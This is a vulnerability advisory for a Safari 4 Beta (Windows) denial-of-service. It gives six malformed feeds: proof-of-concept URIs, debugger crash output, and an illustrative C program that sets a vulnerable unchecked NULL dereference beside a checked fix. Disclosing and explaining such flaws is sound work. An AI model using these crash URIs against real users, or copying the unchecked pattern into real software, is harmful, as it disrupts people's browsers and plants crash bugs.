Date: Feb 25 2009
Class: Input Validation Error
Local: Yes
Remote: Yes
Vulnerable Versions:
- Apple Safari 4 (528.16) - Public Beta - Windows version.
Note: The Mac OS X version is not affected.
Description:
Apple Safari is prone to a denial-of-service vulnerability caused by a NULL pointer dereference: it fails to adequately sanitize user-supplied input within a feeds: URI, and the malformed URI is then used without a NULL check.
Attackers can exploit this issue to crash the Safari process and cause a denial-of-service condition on a user's computer. A malicious web page only needs to get the browser to navigate to (or load) such a feeds: URI.
Proof-of-Concept:
feeds:%&www.rec-sec.com/feed/ DoS
feeds:{&www.rec-sec.com/feed/ DoS
feeds:}&www.rec-sec.com/feed/ DoS
feeds:^&www.rec-sec.com/feed/ DoS
feeds:`&www.rec-sec.com/feed/ DoS
feeds:|&www.rec-sec.com/feed/ DoS
Any feeds: URI whose host part contains one of these characters (%, {, }, ^, `, |) will cause a denial-of-service condition.
Debugger output:
Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=00000000 edx=0200078c esi=05adccd8 edi=01fa2e58
eip=60029915 esp=035af304 ebp=035af32c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
PubSubDLL!PSDLL_SetPreferencesDomain+0x284d5:
60029915 ff7050 push dword ptr [eax+50h] ds:0023:00000050=????????
eax is 0 at the faulting instruction, so the push reads from address 0x50: a NULL pointer plus a field offset. The fault is a read through an unchecked NULL pointer, so the result is a crash of the Safari process rather than a controllable memory write.
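The following is an added illustration of the crash pattern shown in the debugger output, not Safari or PubSubDLL code: a lookup that returns NULL for a malformed feeds: host, a caller that reads a field through that NULL pointer (the equivalent of push dword ptr [eax+50h] with eax=0), and a hardened caller that checks the result and fails closed. The struct layout, the resolve_feed() function and the rule that the listed characters make the lookup fail are assumptions made for the example.

```c
/* Added illustration (hypothetical, not Safari/PubSubDLL code) of a NULL
 * pointer dereference through a struct field at a non-zero offset, beside
 * the checked version. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOST_MAX 64

/* Hypothetical feed record; 'fetch' sits past the start of the struct,
 * like the +0x50 field read in the advisory's debugger output. */
struct feed_source {
    char   scheme[16];
    char   host[HOST_MAX];
    int  (*fetch)(const struct feed_source *);  /* dereferenced by callers */
};

static int dummy_fetch(const struct feed_source *f) { (void)f; return 0; }

/* Characters the advisory lists as triggering the crash in a feeds: host. */
static const char BAD_HOST_CHARS[] = "%{}^`|";

/* Hypothetical resolver: parses "feeds:<host>/..." and returns NULL when the
 * scheme is wrong or the host contains a byte it rejects. The returned
 * record is heap-allocated and must be freed by the caller. */
static struct feed_source *resolve_feed(const char *uri) {
    const char *prefix = "feeds:";
    size_t plen = strlen(prefix);
    if (strncmp(uri, prefix, plen) != 0) return NULL;
    const char *host = uri + plen;
    size_t hlen = strcspn(host, "/");          /* host ends at first '/' */
    if (hlen == 0 || hlen >= HOST_MAX) return NULL;
    for (size_t i = 0; i < hlen; i++)
        if (strchr(BAD_HOST_CHARS, host[i])) return NULL;  /* malformed host */
    struct feed_source *f = calloc(1, sizeof *f);
    if (!f) return NULL;
    memcpy(f->scheme, "feeds", 6);
    memcpy(f->host, host, hlen);
    f->fetch = dummy_fetch;
    return f;
}

/* Vulnerable caller: trusts resolve_feed() and reads f->fetch unconditionally.
 * For a rejected host this reads through address 0 plus the field offset and
 * crashes the process, which is the DoS the advisory describes. */
int open_feed_unchecked(const char *uri) {
    struct feed_source *f = resolve_feed(uri);
    int rc = f->fetch(f);          /* NULL dereference when f == NULL */
    free(f);
    return rc;
}

/* Hardened caller: validates the lookup result and rejects the URI instead. */
int open_feed_checked(const char *uri) {
    struct feed_source *f = resolve_feed(uri);
    if (f == NULL) return -1;      /* malformed feeds: URI, no crash */
    int rc = f->fetch(f);
    free(f);
    return rc;
}

int main(void) {
    /* Constructed sample URIs: one well-formed, two from the PoC list. */
    const char *samples[] = {
        "feeds:www.rec-sec.com/feed/",
        "feeds:%&www.rec-sec.com/feed/",
        "feeds:|&www.rec-sec.com/feed/",
    };
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++)
        printf("%-32s -> %d\n", samples[i], open_feed_checked(samples[i]));
    return 0;
}
```

Running open_feed_unchecked() on any of the PoC URIs reproduces the access violation on the host machine; open_feed_checked() returns -1 for them and 0 for the well-formed URI. The fix in the real code would be the same shape: check the result of the URI/host lookup before touching its fields, or reject the offending characters when the feeds: URI is parsed.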
Disclosure:
Vendor has been informed.
Solution:
No vendor fix is available at the time of publication.
Credit: Trancer